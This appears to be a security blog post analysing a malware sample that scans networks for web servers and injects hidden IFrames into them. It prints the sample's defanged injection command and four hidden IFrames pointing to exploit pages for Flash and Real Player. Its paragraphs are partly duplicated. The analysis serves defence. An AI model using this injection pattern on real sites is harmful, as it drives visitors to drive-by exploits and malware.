IFrame Injection Attacks
Attacks against web servers are en vogue nowadays. This can be mass SQL injection attacks that insert malicious JavaScript into web sites or other forms of IFrame injection attacks.
Today we analyzed a malware sample that performs such IFrame injection attacks. The executable with MD5 hash e3e3eb9e00745537a17311a48ddcfd6d is detected by Kaspersky as Backdoor.Win32.Agent.fjs or by ClamAV as PUA.Packed.NPack-3. When executed, the sample creates several files on the hard disk: it drops several benign DLLs such as wpcap.dll and npptools.dll which are all related to packet processing. Furthermore, two executables 3.tmp and 6.tmp are created.
Then the file 6.tmp is executed with the command line parameter
The intention is that the infected machines should scan a specific network range for web servers on port 80 and then try to inject a specific IFrame into vulnerable servers.
An analysis of the injected site leads to more malware. The HTML file contains for example four more IFrames:
As the names suggest, these IFrames contain exploits against well-known vulnerabilities in applications such as Flash or Real Player 11. Each of these exploits tries to install additional malware.
Today we analyzed a malware sample that performs such IFrame injection attacks. The executable with MD5 hash e3e3eb9e00745537a17311a48ddcfd6d is detected by Kaspersky as Backdoor.Win32.Agent.fjs or by ClamAV as PUA.Packed.NPack-3. When executed, the sample creates several files on the hard disk: it drops several benign DLLs such as wpcap.dll and npptools.dll which are all related to packet processing. Furthermore, two executables 3.tmp and 6.tmp are created.
Then the file 6.tmp is executed with the command line parameter
-idx 0 -ip $IP-RANGE -port 80 -insert "< if rame sr c="hXXp://www.XXX.cn/index.htm" width=0 height=0 frameborder=0>"
The intention is that the infected machines should scan a specific network range for web servers on port 80 and then try to inject a specific IFrame into vulnerable servers.
An analysis of the injected site leads to more malware. The HTML file contains for example four more IFrames:
IF RAME sr c="hXXp://www.XXX.cn/index.files/flash.htm" frameBorder=0 width=100 scrolling=no height=1>
IF RAME sr c="hXXp://www.XXX.cn/index.files/real.htm" frameBorder=0 width=100 scrolling=no height=1>
IF RAME sr c="hXXp://www.XXX.cn/index.files/614.htm" frameBorder=0 width=100 scrolling=no height=1>
IF RAME sr c="hXXp://www.XXX.cn/web/index.htm" frameBorder=0 width=100 scrolling=no height=1>
As the names suggest, these IFrames contain exploits against well-known vulnerabilities in applications such as Flash or Real Player 11. Each of these exploits tries to install additional malware.
".
